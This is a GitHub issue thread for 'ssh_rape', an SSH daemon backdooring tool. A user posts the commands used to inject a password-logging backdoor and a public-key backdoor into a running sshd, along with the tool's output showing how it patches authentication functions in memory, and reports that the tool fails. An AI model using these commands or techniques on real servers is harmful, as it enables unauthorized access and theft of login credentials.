search

blasty / ssh_rape

38 stars 14 forks source link

ERROR: key_new not found :( #12

Open Amodio opened 8 years ago

Amodio commented 8 years ago

Hello,

Thank you for your code, it's a great piece of work :+1: I have been trying to run it on my debian station (OpenSSH_6.9p1 Debian-3, OpenSSL 1.0.2d 9 Jul 2015, binary here sshd.zip) :

$ sudo ./ssh_rape -P ~/.ssh/id_rsa.pub -t 127.0.0.1:31337 $(pidof sshd|awk '{print $1}')
      _______  __________ ___.    _____     _____________  ______
    _/  ____/_/  ____|   |   |   _\ __ )_  _\__   \  __  \/  __  )_ 
   /\___   \/\___   \|   '   |  |    /   \/   _   /   /  /  __/___/_
  /    /   /    /    /   |   \  |   ,    /   /  . |  ___/   \/     /
  \ _______\ _______/____|____\ |___:\___\_____/__|   | \__________\
   \/       \/                                    \___|

[+] you gave me pid 8157

[+] slurping stuff to memory..
[+] found sshd ELF base @ 0x55fb79f76000
[+] loaded 117 memory mappings
[+] sshd binary path = '/usr/sbin/sshd'
[+] oh, we're dealing with an sshd that probably uses sshkey_* api..
[+] syscall         = 0x55fb79f9cd75
[+] rexec_flag          = 0x55fbbef87fed
[+] allocating config memory @ 0x55fb7a039000
[+] found sshd ELF base @ 0x55fb79f76000
[+] installing passlogger backdoor for [0x0100007f:0x697a] (TCP)..
[!] ERROR: could not locate use_privsep :(
$
[...]
$ sudo ./ssh_rape -P ~/.ssh/id_rsa.pub $(pidof sshd|awk '{print $1}')
      _______  __________ ___.    _____     _____________  ______
    _/  ____/_/  ____|   |   |   _\ __ )_  _\__   \  __  \/  __  )_ 
   /\___   \/\___   \|   '   |  |    /   \/   _   /   /  /  __/___/_
  /    /   /    /    /   |   \  |   ,    /   /  . |  ___/   \/     /
  \ _______\ _______/____|____\ |___:\___\_____/__|   | \__________\
   \/       \/                                    \___|

[+] you gave me pid 7399

[+] slurping stuff to memory..
[+] found sshd ELF base @ 0x55ee7c843000
[+] loaded 117 memory mappings
[+] sshd binary path = '/usr/sbin/sshd'
[+] oh, we're dealing with an sshd that probably uses sshkey_* api..
[+] syscall         = 0x55ee7c869d75
[+] rexec_flag          = 0x55eec1854fed
[+] allocating config memory @ 0x55ee7c906000
[+] found sshd ELF base @ 0x55ee7c843000
[+] installing pubkey backdoor..
[+] lea = 0x55ee7c86812b
[+] key_allowed     = 0x24d40 .. patched at offset 0x8 in import table!
[+] lea = 0x55ee7c8a07d5
[+] restore_uid     = 0x5d7b0 .. patched at offset 0x10 in import table!
[+] DSA_new@got = 0x0
[+] BN_new@got = 0x0
[+] DSA_new@plt = 0x0
[+] BN_new@plt = 0x0
[+] yo we got a callpair for (DSA_new, BN_new) -> 0x0
[!] ERROR: key_new not found :(

Thanks for any help :)

blasty commented 8 years ago

Hi @Amodio. I will try to investigate this once I find some time. Thanks for reporting.